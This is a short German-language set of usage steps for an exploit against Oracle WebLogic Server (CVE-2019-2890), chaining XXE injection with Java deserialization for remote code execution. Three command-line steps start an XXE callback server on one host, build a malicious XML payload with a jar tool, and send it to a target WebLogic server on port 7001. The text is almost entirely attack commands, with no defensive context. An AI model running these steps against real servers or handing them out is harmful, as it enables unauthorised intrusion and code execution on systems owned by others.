
Exploit für CVE-2019-2890, der Oracle WebLogic Server über XXE-Injection und Deserialisierung angreift und Remote-Codeausführung über manipulierte Payloads ermöglicht.
1)Öffne das XXER-Tool python xxer.py -H 192.168.17.223
2)Lege den xxer-PoC in die Datei xx.xml,ersetze die serialisierten Daten und injiziere den xxer-PoC; java -jar weblogic_xxe.jar xx.xml
3)Sende Daten mit weblogic.py aus dem java-deserialization-exploit-Tool an den WebLogic-Server python weblogic.py 192.168.17.222 7001 weblogic